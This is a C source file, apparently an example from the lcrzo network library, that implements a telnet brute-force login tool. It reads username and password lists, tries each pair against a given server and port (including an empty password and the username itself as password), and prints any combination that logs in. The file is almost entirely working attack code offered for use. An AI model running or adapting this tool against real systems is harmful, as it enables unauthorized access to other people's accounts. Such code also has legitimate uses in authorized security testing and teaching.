
/* include the library headers */
#include <lcrzo.h>
#include "lcrzoex.h"
#include "shared/shared_telnet.h"

/*-------------------------------------------------------------*/
/* set information about this example */
lcrzoex_infos lcrzoex_000273=
{ /*reference*/     "lcrzoex", 273,
  /*version*/       1, 0,
  /*title*/         "telnet brute force",
  /*french title*/  "brute force telnet",
  /*description*/   "",
  /*french desc.*/  "",
  /*usage*/         "server_name server_port usernamesfile passwdsfile",
  /*french usage*/  "nom_serveur port_serveur fichierutilisateurs fichiermotsdepasse",
  /*usage example*/ "1.2.3.4 23 /tmp/userlist /tmp/passlist",
  /*fr. usage ex.*/ "1.2.3.4 23 /tmp/listutil /tmp/listepasswd",
  /*author*/        "Laurent"
};

/*-------------------------------------------------------------*/
/* function declarations */
int lcrzoex_000273_main(int argc, char *argv[]);
int lcrzoex_000273_telnet_brute(lcrzo_ipl ipl,
				lcrzo_uint16 port,
				lcrzo_conststring user,
				lcrzo_conststring pass);

/*-------------------------------------------------------------*/
/* main function : you can rename it to "main", and then this file
   can be compiled alone. */
int lcrzoex_000273_main(int argc, char *argv[])
{ lcrzo_ipl ipl;
  lcrzo_uint16 port;
  lcrzo_data data;
  lcrzo_string user, pass;
  lcrzo_int32 datasize;
  int fduser, fdpass;

  if ( argc<5 )
  { /* print usage */
    lcrzo_epr(lcrzoex_infos_print(lcrzoex_000268, argv[0]));
    return(LCRZO_ERR_BULCRZOEXBADUSAGE);
  }

  /* initialize the needed variables */
  lcrzo_epr(lcrzo_ipl_init_hs(argv[1], &ipl));
  port=(lcrzo_uint16)atoi(argv[2]);
  lcrzo_epr(lcrzo_fd_open_read(argv[3], &fduser));

  /* read each line of the files all try to access */  
  while ( lcrzo_fd_readm_line(fduser, LCRZO_TRUE, &data, &datasize)
          == LCRZO_ERR_OK )
  { user=data;
    user[datasize]='\0';
    /* first, try with pass=="" */
    lcrzo_epr(lcrzoex_000273_telnet_brute(ipl, port, user, ""));
    /* then, try with pass==login */
    lcrzo_epr(lcrzoex_000273_telnet_brute(ipl, port, user, user));
    /* then try each password of the file */
    lcrzo_epr(lcrzo_fd_open_read(argv[4], &fdpass));
    while ( lcrzo_fd_readm_line(fdpass, LCRZO_TRUE, &data, &datasize)
          == LCRZO_ERR_OK )
    { pass=data;
      pass[datasize]='\0';
      lcrzo_epr(lcrzoex_000273_telnet_brute(ipl, port, user, pass));
      lcrzo_string_free(pass);
    }
    lcrzo_epr(lcrzo_fd_close(fdpass));
    lcrzo_string_free(user);
  }

  /* close */
  lcrzo_epr(lcrzo_fd_close(fduser));
  return(LCRZO_ERR_OK);
}

/*-------------------------------------------------------------*/
int lcrzoex_000273_telnet_brute(lcrzo_ipl ipl,
				lcrzo_uint16 port,
				lcrzo_conststring user,
				lcrzo_conststring pass)
{ static lcrzo_int32 numtest=0;
  lcrzo_telnet telnet;
  int ret;

  /* init the session */
  lcrzo_epr(shared_telnet_init(ipl, port, &telnet));

  /* send login/password */
  ret=shared_telnet_login(&telnet, user, pass);
  if ( ret==LCRZO_ERR_OK)
  { printf("%s\t%s\t-> OK\n", user, pass);
    /* logout */
    lcrzo_epr(shared_telnet_logout(&telnet));
    /* close the session */
    lcrzo_epr(shared_telnet_close(&telnet));
  }
  else if ( ret==LCRZOEX_ERR_TELNET_BADLOGINPASS )
  { numtest++;
    if (!(numtest%10)) printf("%ld passwd tried\n", numtest);
  }
  else
    return(ret);

  return (LCRZO_ERR_OK);
}

